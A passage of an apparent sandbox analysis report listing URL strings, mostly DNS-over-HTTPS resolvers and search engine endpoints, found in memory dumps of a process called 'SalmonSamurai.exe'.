Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10;
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30Z
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.icohttps://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/favicon.icohttps://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fi.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/favicon.icohttps://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://fr.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Docs/issues/1005)
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.imgsmail.ru/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.imgsmail.ru/favicon.icohttps://go.mail.ru/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.mail.ru/chrome/newtab/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://go.mail.ru/search?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/favicon.icohttps://hk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://hladaj.atlas.sk/fulltext/?phrase=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/favicon.icohttps://id.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://id.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://in.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://log.getdropbox.com/hpkp
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://lss.sse-iacapps.com/query?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/favicon.icohttps://malaysia.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://malaysia.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/favicon.icohttps://metager.de/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.de/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://metager.org/meta/meta.ger3?eingabe=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/favicon.icohttps://mx.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://nextdns.io/privacy
